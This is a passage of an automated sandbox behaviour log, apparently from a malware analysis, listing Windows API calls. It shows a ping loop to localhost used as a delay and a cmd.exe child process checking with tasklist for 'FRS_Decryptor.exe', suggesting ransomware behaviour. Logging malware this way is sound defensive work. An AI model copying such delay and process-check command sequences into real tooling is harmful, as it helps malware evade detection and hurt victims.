lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x238940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0087.414] _fileno (_File=0x76ea4c28) returned 1 [0087.414] _write (in: _FileHandle=1, _Buf=0x238940*, _MaxCharCount=0x9 | out: _Buf=0x238940*) returned 9 [0087.414] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0087.414] _fileno (_File=0x76ea4c28) returned 1 [0087.414] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0087.414] LocalFree (hMem=0x238940) returned 0x0 [0087.414] LocalFree (hMem=0x247fa0) returned 0x0 [0087.414] Sleep (dwMilliseconds=0x3e8) [0088.427] IcmpSendEcho2Ex (in: IcmpHandle=0x236b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x23c1b0, RequestSize=0x20, RequestOptions=0x1df414, ReplyBuffer=0x245270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x245270) returned 0x1 [0088.427] InetNtopW (in: Family=2, pAddr=0x1df404, pStringBuf=0x1df52c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0088.427] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="羠$ﵨ\x1d⛔\x94䰨盪✣") returned 0x16 [0088.427] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.427] _fileno (_File=0x76ea4c28) returned 1 [0088.427] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.427] GetFileType (hFile=0x28) returned 0x2 [0088.427] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0088.427] GetLastError () returned 0x6 [0088.428] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d✣") returned 0x0 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.428] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0088.428] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x247fd8 [0088.428] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x247fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _write (in: _FileHandle=1, _Buf=0x247fd8*, _MaxCharCount=0x16 | out: _Buf=0x247fd8*) returned 22 [0088.428] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.428] LocalFree (hMem=0x247fd8) returned 0x0 [0088.428] LocalFree (hMem=0x247fa0) returned 0x0 [0088.428] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="羠$ﵨ\x1d⛿\x94䰨盪✼") returned 0x9 [0088.428] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.428] GetFileType (hFile=0x28) returned 0x2 [0088.428] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0088.428] GetLastError () returned 0x6 [0088.428] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d✼") returned 0x0 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.428] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0088.428] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x238a60 [0088.428] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x238a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _write (in: _FileHandle=1, _Buf=0x238a60*, _MaxCharCount=0x9 | out: _Buf=0x238a60*) returned 9 [0088.428] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.428] LocalFree (hMem=0x238a60) returned 0x0 [0088.428] LocalFree (hMem=0x247fa0) returned 0x0 [0088.428] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1df39c, nSize=0x0, Arguments=0x1df398 | out: lpBuffer="羠$ﵨ\x1d➷\x94䰨盪✧") returned 0x9 [0088.428] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.428] GetFileType (hFile=0x28) returned 0x2 [0088.428] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df360 | out: lpMode=0x1df360) returned 0 [0088.428] GetLastError () returned 0x6 [0088.428] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.428] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0088.428] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x238940 [0088.428] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x238940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0088.428] _fileno (_File=0x76ea4c28) returned 1 [0088.428] _write (in: _FileHandle=1, _Buf=0x238940*, _MaxCharCount=0x9 | out: _Buf=0x238940*) returned 9 [0088.429] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.429] _fileno (_File=0x76ea4c28) returned 1 [0088.429] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.429] LocalFree (hMem=0x238940) returned 0x0 [0088.429] LocalFree (hMem=0x247fa0) returned 0x0 [0088.429] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="羠$ﵨ\x1d⟘\x94䰨盪✨") returned 0x9 [0088.429] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.429] _fileno (_File=0x76ea4c28) returned 1 [0088.429] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.429] GetFileType (hFile=0x28) returned 0x2 [0088.429] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0088.429] GetLastError () returned 0x6 [0088.429] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d✨") returned 0x0 [0088.429] _fileno (_File=0x76ea4c28) returned 1 [0088.429] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0088.429] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0088.429] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x2389e8 [0088.429] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x2389e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0088.429] _fileno (_File=0x76ea4c28) returned 1 [0088.429] _write (in: _FileHandle=1, _Buf=0x2389e8*, _MaxCharCount=0x9 | out: _Buf=0x2389e8*) returned 9 [0088.429] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.429] _fileno (_File=0x76ea4c28) returned 1 [0088.429] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0088.429] LocalFree (hMem=0x2389e8) returned 0x0 [0088.429] LocalFree (hMem=0x247fa0) returned 0x0 [0088.429] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x1df320, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0088.429] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x1df2f4, nSize=0x0, Arguments=0x1df2f0 | out: lpBuffer="羠$\x1d᧰\x94䰨盪❏") returned 0x5c [0088.429] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.429] _fileno (_File=0x76ea4c28) returned 1 [0088.429] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.429] GetFileType (hFile=0x28) returned 0x2 [0088.429] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df2b8 | out: lpMode=0x1df2b8) returned 0 [0088.429] GetLastError () returned 0x6 [0088.429] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df21c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0088.429] _fileno (_File=0x76ea4c28) returned 1 [0088.429] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0088.429] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0088.429] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x248068 [0088.429] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x248068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0088.429] _fileno (_File=0x76ea4c28) returned 1 [0088.429] _write (in: _FileHandle=1, _Buf=0x248068*, _MaxCharCount=0x5c | out: _Buf=0x248068*) returned 92 [0088.429] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.429] _fileno (_File=0x76ea4c28) returned 1 [0088.429] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0088.429] LocalFree (hMem=0x248068) returned 0x0 [0088.429] LocalFree (hMem=0x247fa0) returned 0x0 [0088.429] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x1df300, nSize=0x0, Arguments=0x1df2fc | out: lpBuffer="羠$\x1dᨧ\x94䰨盪❓") returned 0x61 [0088.430] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.430] _fileno (_File=0x76ea4c28) returned 1 [0088.430] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.430] GetFileType (hFile=0x28) returned 0x2 [0088.430] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df2c4 | out: lpMode=0x1df2c4) returned 0 [0088.430] GetLastError () returned 0x6 [0088.430] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df228, nSize=0x50 | out: lpBuffer="\x1d❓") returned 0x0 [0088.430] _fileno (_File=0x76ea4c28) returned 1 [0088.430] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0088.430] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0088.430] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x248070 [0088.430] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x248070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0088.430] _fileno (_File=0x76ea4c28) returned 1 [0088.430] _write (in: _FileHandle=1, _Buf=0x248070*, _MaxCharCount=0x61 | out: _Buf=0x248070*) returned 97 [0088.430] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.430] _fileno (_File=0x76ea4c28) returned 1 [0088.430] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0088.430] LocalFree (hMem=0x248070) returned 0x0 [0088.430] LocalFree (hMem=0x247fa0) returned 0x0 [0088.430] IcmpCloseHandle (IcmpHandle=0x236b80) returned 1 [0088.430] LocalFree (hMem=0x23c1b0) returned 0x0 [0088.430] LocalFree (hMem=0x245270) returned 0x0 [0088.430] WSACleanup () returned 0 [0088.431] exit (_Code=0) Thread: id = 224 os_tid = 0x4cc Thread: id = 225 os_tid = 0x940 Process: id = "74" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xfec2000" os_pid = "0x8c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3961 start_va = 0xa70000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 3962 start_va = 0xa90000 end_va = 0xa91fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 3963 start_va = 0xaa0000 end_va = 0xaaefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 3964 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 3965 start_va = 0xaf0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 3966 start_va = 0xbf0000 end_va = 0xbf3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 3967 start_va = 0xc00000 end_va = 0xc00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 3968 start_va = 0xc10000 end_va = 0xc11fff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 3969 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3970 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3971 start_va = 0x7ef90000 end_va = 0x7efb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef90000" filename = "" Region: id = 3972 start_va = 0x7efb4000 end_va = 0x7efb4fff entry_point = 0x0 region_type = private name = "private_0x000000007efb4000" filename = "" Region: id = 3973 start_va = 0x7efbc000 end_va = 0x7efbcfff entry_point = 0x0 region_type = private name = "private_0x000000007efbc000" filename = "" Region: id = 3974 start_va = 0x7efbd000 end_va = 0x7efbffff entry_point = 0x0 region_type = private name = "private_0x000000007efbd000" filename = "" Region: id = 3975 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3976 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3977 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3978 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3979 start_va = 0xd50000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 3980 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3981 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3982 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3983 start_va = 0xa70000 end_va = 0xa7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 3984 start_va = 0xa80000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 3985 start_va = 0xc20000 end_va = 0xc9dfff entry_point = 0xc20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3986 start_va = 0xe70000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 3987 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3988 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3989 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3990 start_va = 0x7ee90000 end_va = 0x7ef8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee90000" filename = "" Region: id = 3991 start_va = 0xa90000 end_va = 0xa93fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 3992 start_va = 0xf70000 end_va = 0x1244fff entry_point = 0xf70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4011 start_va = 0xca0000 end_va = 0xca3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Thread: id = 226 os_tid = 0x464 [0088.457] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0088.457] __set_app_type (_Type=0x1) [0088.457] __p__fmode () returned 0x76ea1768 [0088.457] __p__commode () returned 0x76ea176c [0088.457] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0088.458] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0088.458] GetCurrentThreadId () returned 0x464 [0088.458] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x464) returned 0x34 [0088.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0088.458] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0088.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.460] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.460] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xbef930 | out: phkResult=0xbef930*=0x0) returned 0x2 [0088.461] VirtualQuery (in: lpAddress=0xbef93f, lpBuffer=0xbef8d8, dwLength=0x1c | out: lpBuffer=0xbef8d8*(BaseAddress=0xbef000, AllocationBase=0xaf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0088.461] VirtualQuery (in: lpAddress=0xaf0000, lpBuffer=0xbef8d8, dwLength=0x1c | out: lpBuffer=0xbef8d8*(BaseAddress=0xaf0000, AllocationBase=0xaf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0088.461] VirtualQuery (in: lpAddress=0xaf1000, lpBuffer=0xbef8d8, dwLength=0x1c | out: lpBuffer=0xbef8d8*(BaseAddress=0xaf1000, AllocationBase=0xaf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0088.461] VirtualQuery (in: lpAddress=0xaf3000, lpBuffer=0xbef8d8, dwLength=0x1c | out: lpBuffer=0xbef8d8*(BaseAddress=0xaf3000, AllocationBase=0xaf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0088.461] VirtualQuery (in: lpAddress=0xbf0000, lpBuffer=0xbef8d8, dwLength=0x1c | out: lpBuffer=0xbef8d8*(BaseAddress=0xbf0000, AllocationBase=0xbf0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0088.461] GetConsoleOutputCP () returned 0x1b5 [0088.461] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0088.461] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0088.461] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0088.461] SetConsoleMode (hConsoleHandle=0x2a0, dwMode=0x0) returned 0 [0088.461] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0088.461] GetConsoleMode (in: hConsoleHandle=0x2a0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0088.461] _get_osfhandle (_FileHandle=0) returned 0x24 [0088.461] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0088.462] GetEnvironmentStringsW () returned 0xe740c0* [0088.462] FreeEnvironmentStringsA (penv="=") returned 1 [0088.462] GetEnvironmentStringsW () returned 0xe740c0* [0088.462] FreeEnvironmentStringsA (penv="=") returned 1 [0088.462] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xbee880 | out: phkResult=0xbee880*=0x44) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x0, lpData=0xbee88c*=0x0, lpcbData=0xbee884*=0x1000) returned 0x2 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x4, lpData=0xbee88c*=0x1, lpcbData=0xbee884*=0x4) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x0, lpData=0xbee88c*=0x1, lpcbData=0xbee884*=0x1000) returned 0x2 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x4, lpData=0xbee88c*=0x0, lpcbData=0xbee884*=0x4) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x4, lpData=0xbee88c*=0x40, lpcbData=0xbee884*=0x4) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x4, lpData=0xbee88c*=0x40, lpcbData=0xbee884*=0x4) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x0, lpData=0xbee88c*=0x40, lpcbData=0xbee884*=0x1000) returned 0x2 [0088.462] RegCloseKey (hKey=0x44) returned 0x0 [0088.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xbee880 | out: phkResult=0xbee880*=0x44) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x0, lpData=0xbee88c*=0x40, lpcbData=0xbee884*=0x1000) returned 0x2 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x4, lpData=0xbee88c*=0x1, lpcbData=0xbee884*=0x4) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: 